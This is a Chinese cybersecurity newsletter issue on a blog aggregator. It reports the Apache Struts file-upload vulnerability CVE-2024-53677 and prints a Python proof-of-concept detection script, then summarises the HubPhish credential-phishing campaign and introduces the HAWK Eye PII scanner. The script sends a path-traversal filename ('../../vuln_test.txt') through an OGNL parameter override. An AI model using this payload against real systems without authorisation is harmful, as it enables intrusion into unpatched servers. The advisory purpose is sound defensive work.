网安瞭望台第16期

国内外要闻

Apache Struts 文件上传漏洞(CVE - 2024 - 53677)

    近日,Apache Struts 被发现存在文件上传漏洞(CVE - 2024 - 53677),安恒 CERT 评级为 2 级,CVSS3.1 评分为 8.1。

    漏洞危害:若用户未正确配置验证和过滤机制,攻击者可操纵文件上传参数启用路径遍历,利用未授权的上传功能执行恶意代码。需注意,未使用 FileUploadInterceptor 的情况下不受该漏洞影响。

    POC为:


import requests
import argparse
import logging
from urllib.parse import urljoin
from requests_toolbelt.multipart.encoder import MultipartEncoder
import random# 配置日志记录
logging.basicConfig(level=logging.INFO,format="%(asctime)s [%(levelname)s] %(message)s",handlers=[logging.StreamHandler()]
)def detect_vulnerability(target_url, upload_endpoint):"""非破坏性检测CVE - 2024 - 53677漏洞"""logging.info("Starting detection for CVE - 2024 - 53677 (S2 - 067)...")upload_url = urljoin(target_url, upload_endpoint)test_filename = "../../vuln_test.txt"harmless_content = "S2 - 067 detection test."# 尝试使用OGNL绑定覆盖文件名files = {"upload": ("test.txt", harmless_content, "text/plain"),"top.uploadFileName": test_filename  # 尝试覆盖文件名}# 自定义Content - Type边界boundary = "----WebKitFormBoundary" + "".join(random.choices("abcdefghijklmnopqrstuvwxyz0123456789", k=16))m = MultipartEncoder(fields=files, boundary=boundary)headers = {"User - Agent": "Mozilla/5.0","Content - Type": m.content_type}logging.info(f"Sending test request to upload endpoint: {upload_url}")try:# 发送文件上传请求response = requests.post(upload_url, headers=headers, data=m, timeout=10)# 分析HTTP响应if response.status_code == 200:logging.info("[INFO] File upload request succeeded.")if "vuln_test.txt" in response.text:logging.warning("[ALERT] File name overwrite detected. Target may be vulnerable!")else:logging.info("[INFO] Target does not appear vulnerable.")elif response.status_code in [403, 401]:logging.info("[INFO] Access denied. Ensure proper permissions.")else:logging.info(f"[INFO] Unexpected HTTP response: {response.status_code}")except requests.exceptions.RequestException as e:logging.error(f"[ERROR] Request failed: {e}")def main():parser = argparse.ArgumentParser(description="CVE - 2024 - 53677 (S2 - 067) Non - destructive Detection Tool")parser.add_argument("-u", "--url", required=True, help="Target base URL (e.g., http://example.com)")parser.add_argument("--upload_endpoint", required=True, help="Path to file upload endpoint (e.g., /upload.action)")args = parser.parse_args()logging.info("Starting detection process...")detect_vulnerability(args.url, args.upload_endpoint)logging.info("Detection process completed.")if __name__ == "__main__":main()

漏洞靶场

https://github.com/rockmelodies/struts2-vuln-test

图片

HubPhish 利用 HubSpot 工具针对欧洲用户的凭证窃取攻击

    近期,网络安全研究人员披露了一场新的网络钓鱼活动。此次活动以欧洲公司为目标,旨在窃取账户凭证并掌控受害者的微软 Azure 云基础设施。该活动因攻击链中滥用 HubSpot 工具而被 Palo Alto Networks Unit 42 命名为 HubPhish,其目标至少涵盖欧洲 20,000 名汽车、化工和化合物制造行业的用户。

图片

    据安全研究人员 Shachar Roitman、Ohad Benyamin Maimon 和 William Gamazo 在与 The Hacker News 分享的报告中称,该活动的钓鱼尝试在 2024 年 6 月达到顶峰,攻击者利用 HubSpot 免费表单构建器服务创建虚假表单。攻击过程是先发送带有 Docusign 主题诱饵的钓鱼邮件,诱使用户查看文档,随后将用户重定向到恶意的 HubSpot 免费表单构建器链接,接着引导至虚假的 Office 365 Outlook Web App 登录页面以窃取凭证。Unit 42 指出,他们识别出至少 17 个有效的免费表单用于将受害者重定向到不同的威胁行为者控制的域名,其中很大一部分域名托管在 “.buzz” 顶级域名上,且该钓鱼活动通过包括 Bulletproof VPS 主机在内的各种服务进行托管,威胁行为者还利用此基础设施在账户接管操作期间访问受感染的微软 Azure 租户。成功获取账户访问权限后,攻击者会在账户下添加其控制的新设备以建立持久性。

    与此同时,攻击者还被发现通过在钓鱼邮件中冒充 SharePoint,传播名为 XLoader(Formbook 的后继者)的信息窃取恶意软件家族。此外,钓鱼攻击正不断寻找新方法来绕过电子邮件安全措施,如滥用谷歌日历和谷歌绘图等合法服务,以及假冒 Proofpoint、Barracuda Networks、Mimecast 和 Virtru 等电子邮件安全提供商品牌。利用与谷歌服务相关信任的攻击方式是发送包含日历(.ICS)文件及谷歌表单或谷歌绘图链接的电子邮件,用户点击链接后会被提示点击另一个通常伪装成 reCAPTCHA 或支持按钮的链接,一旦点击,受害者就会被转发到实施金融诈骗的虚假页面。为此,建议用户启用谷歌日历中的 “已知发件人” 设置以防范此类钓鱼攻击。网络安全形势日益严峻,各方需提高警惕,加强防范措施以应对不断变化的网络威胁。

图片

知识分享

HAWK Eye—— 多平台数据安全检测利器

    在当今数字化时代,数据安全面临着前所未有的挑战。HAWK Eye 这款强大的命令行工具应运而生,致力于防范数据泄露与网络威胁。

    HAWK Eye 能够快速扫描多种数据源,包括 S3、MySQL、PostgreSQL、MongoDB、CouchDB、Google Drive、Slack、Redis、Firebase、文件系统以及 Google Cloud buckets(GCS)等,精准查找个人可识别信息(PII)和机密信息。它运用先进的文本分析与光学字符识别(OCR)技术,深入挖掘诸如 docx、xlsx、pptx、pdf、图像(jpg、png、gif)、压缩文件(zip、tar、rar)甚至视频文件等各类文档格式,确保在不同平台上提供全面的保护。

    其安装方式多样,可通过 pip 或 pip3 轻松安装,如 “pip3 install hawk-scanner”。使用 Docker hub 也是便捷之选,只需按照特定命令挂载配置文件并运行相应指令即可。当然,也能使用 HAWK Eye 二进制文件,还可将其导入自己的 Python 脚本和工作流程,以获取更高的灵活性。例如,在 Python 脚本中可通过 “from hawk_scanner.internals import system; pii = system.scan_file ("/Users/kumarohit/Downloads/Resume.pdf"); print (pii)” 这样的代码来扫描文件。

    HAWK Eye 具备众多关键特性。它能迅速扫描多数据源中的 PII 数据与恶意软件暴露风险,其先进算法和深度扫描能力可进行全面的安全审计。借助 Slack 等集成功能,能实时发出警报与通知,让用户及时知晓潜在的数据漏洞,并且未来还会有更多集成。新的命令支持 S3、MySQL、PostgreSQL、Redis、Firebase、文件系统和 GCS 等,进一步拓展了工具的功能范围。“--debug” 标志可打印所有调试输出,便于全面排查故障;“--json” 标志能将输出保存为 JSON 格式并指定文件名。这款工具在设计上还融入了爱与幽默,让用户在数据安全之旅中享受轻松愉悦的体验。

    在使用方面,若不提供特定命令,默认会运行所有命令(firebase、fs、gcs、mysql、text、couchdb、gdrive、gdrive workspace、slack、postgresql、redis、s3)。同时,它提供了丰富的选项,如 “firebase” 可扫描 Firebase 配置文件中的 PII 和机密数据,“fs” 用于扫描文件系统配置文件等,还可通过 “--connection” 指定连接 YAML 本地文件路径,“--fingerprint” 提供指纹文件路径等。

    配置 HAWK Eye 连接时,需使用 YAML 文件存储各种数据源的连接配置文件(connection.yml),该文件位于 config 目录。用户可根据需求添加或删除配置文件中的数据源配置,若无需扫描全部数据源,也可仅配置部分数据源。

    此外,HAWK Eye 的扩展性允许开发者贡献新的安全命令。开发者可通过在 GitHub 上 fork 仓库,在 commands 目录创建新的 Python 文件并定义执行函数,提供清晰文档与注释,测试命令后提交 pull request 等步骤来添加新命令。同时,开源社区也可通过遵循贡献指南来为提升 HAWK Eye 保障数据源安全的能力贡献力量,包括遵循编码标准、编写清晰的提交消息、包含合适的测试用例以及更新 README.md 文件等步骤。

    HAWK Eye 曾在 Black Hat SecTor 2023、Black Hat Middle East and Africa 2023、Black Hat Europe 2023 等会议上亮相。

图片

图片

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/890436.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

基于python使用UDP协议对飞秋进行通讯—DDOS

基于飞秋的信息传输 声明:笔记的只是方便各位师傅学习知识,以下代码、网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负。 老规矩,封面在文末! 飞秋介绍 (…

JAVA:组合模式(Composite Pattern)的技术指南

1、简述 组合模式(Composite Pattern)是一种结构型设计模式,旨在将对象组合成树形结构以表示“部分-整体”的层次结构。它使客户端对单个对象和组合对象的使用具有一致性。 设计模式样例:https://gitee.com/lhdxhl/design-pattern-example.git 2、什么是组合模式 组合模式…

LeetCode:222.完全二叉树节点的数量

跟着carl学算法,本系列博客仅做个人记录,建议大家都去看carl本人的博客,写的真的很好的! 代码随想录 LeetCode:222.完全二叉树节点的数量 给你一棵 完全二叉树 的根节点 root ,求出该树的节点个数。 完全二…

MaxKB基于大语言模型和 RAG的开源知识库问答系统的快速部署教程

1 部署要求 1.1 服务器配置 部署服务器要求: 操作系统:Ubuntu 22.04 / CentOS 7.6 64 位系统CPU/内存:4C/8GB 以上磁盘空间:100GB 1.2 端口要求 在线部署MaxKB需要开通的访问端口说明如下: 端口作用说明22SSH安装…

基于指纹图像的数据隐藏和提取matlab仿真

目录 1.算法运行效果图预览 2.算法运行软件版本 3.部分核心程序 4.算法理论概述 5.算法完整程序工程 1.算法运行效果图预览 (完整程序运行后无水印) 2.算法运行软件版本 matlab2022a 3.部分核心程序 (完整版代码包含详细中文注释和操作步骤视频&#xff09…

kubeadm一键部署K8S 集群架构

kubeadm一键部署K8S 集群架构(centos7) https://www.k8src.cn/ https://kubernetes.io/zh-cn/docs/home/ https://blog.csdn.net/m0_58709145/article/details/140128179 https://blog.csdn.net/jiaqijiaqi666/article/details/129745828 Kubeadm init报错[ERROR CRI]: contai…

直流电机驱动电路分享(HIP4082)

一、原理图分享 注意:M2_INA、M2_INB可直接接3.3V电平信号。 二、芯片介绍 1、HIP4082 HIP4082是一款高频驱动器,专为半桥和全桥应用而设计。它具有四个高/低侧驱动输出,可以提供高达100V的驱动电压。HIP4082还具有逻辑级输入和反馈输入&a…

企业版 YashanDB 23.2.4 分布式集群 数据库一主二备集群安装部署指南

一、概述 1.1 文档目标 本部分旨在为技术人员提供崖山数据库企业版 23.2 在 CentOS 7 x86_64 操作系统上进行安装部署操作的全面且清晰的指引。通过对系统架构、集群拓扑和部署需求的精确阐述,使读者能够在安装过程开始前形成系统的概念架构,为后续的详…

性能】JDK和Jmeter的安装与配置

一、JDK环境配置 1. 下载JDK 官网下载地址:http://www.oracle.com/technetwork/java/javase/downloads/java-archive-downloads-javase7-521261.html 选择对应系统的安装包,下载后安装,安装中记录JDK安装的地址,之后一直点击下一…

Mysql之YUM安装时GPG 密钥报错问题处理

一、背景说明 使用YUM安装mysql5.7的时候报错,报错信息提示未安装公钥。博主查看/etc/yum.repos.d/mysql-community.repo配置文件中关于公钥的配置,确实启用了公钥验证,博主再排查过程中还是走了一些弯路,最终顺利解决了&#xff…

启动报错java.lang.NoClassDefFoundError: ch/qos/logback/core/status/WarnStatus

报错信息图片 日志: Exception in thread "Quartz Scheduler [scheduler]" java.lang.NoClassDefFoundError: ch/qos/logback/core/status/WarnStatus先说我自己遇到的问题,我们项目在web设置了自定义的log输出路径,多了一个 / 去…

Elasticsearch-分词器详解

什么是分词器 1、分词器介绍 对文本进行分析处理的一种手段,基本处理逻辑为按照预先制定的分词规则,把原始文档分割成若干更小粒度的词项,粒度大小取决于分词器规则。 常用的中文分词器有ik按照切词的粒度粗细又分为:ik_max_word和ik_smart&…

Docker 入门:如何使用 Docker 容器化 AI 项目(一)

引言 在人工智能(AI)项目的开发和部署过程中,环境配置和依赖管理往往是开发者遇到的挑战之一。开发者通常需要在不同的机器上运行同样的代码,确保每个人使用的环境一致,才能避免 “在我的机器上可以运行”的尴尬问题。…

ExcelVBA编程输出ColorIndex与对应颜色色谱

标题 ExcelVBA编程输出ColorIndex与对应颜色色谱 正文 解决问题编程输出ColorIndex与对应色谱共56,打算分4纵列输出,标题是ColorIndex,Color,Name 1. 解释VBA中的ColorIndex属性 在VBA(Visual Basic for Applications)中&#xff…

2024年11月 蓝桥杯青少组 STEMA考试 Scratch真题

2024年11月 蓝桥杯青少组 STEMA考试 Scratch真题(选择题) 题目总数:5 总分数:50 选择题 第 1 题 单选题 Scratch运行以下程宇后,小兔子会( )。 A. 变小 B. 变大 C. 变色 D. …

springboot470基于协同过滤算法的东北特产销售系统的实现(论文+源码)_kaic

摘 要 信息数据从传统到当代,是一直在变革当中,突如其来的互联网让传统的信息管理看到了革命性的曙光,因为传统信息管理从时效性,还是安全性,还是可操作性等各个方面来讲,遇到了互联网时代才发现能补上自古…

37. Three.js案例-绘制部分球体

37. Three.js案例-绘制部分球体 实现效果 知识点 WebGLRenderer WebGLRenderer 是Three.js中的一个渲染器类,用于将3D场景渲染到网页上。 构造器 WebGLRenderer( parameters : Object ) 参数类型描述parametersObject渲染器的配置参数,可选。 常用…

leetcode 面试经典 150 题:长度最小的子数组

链接长度最小的子数组题序号209题型数组解题方法滑动窗口难度中等 题目 给定一个含有 n 个正整数的数组和一个正整数 target 。找出该数组中满足其总和大于等于 target 的长度最小的 子数组 [numsl, numsl1, …, numsr-1, numsr] ,并返回其长度。如果不存在符合条件…

【游戏设计原理】22 - 石头剪刀布

一、游戏基础:拳头、掌心、分指 首先,石头剪刀布(又名“Roshambo”)看似简单,实际上可是个“深藏玄机”的零和博弈(听起来很高深,其实就是输赢相抵消的意思)。游戏中有三种手势&…

五、windows上vscode构建c/c++环境

1、安装vscode 官网下载界面:https://code.visualstudio.com/Download 请根据电脑系统安装所需版本点击下载链接(一般情况下点击windows按钮即可)鼠标左键双击,即可运行安装程序,点击【确认】;选择安装路径…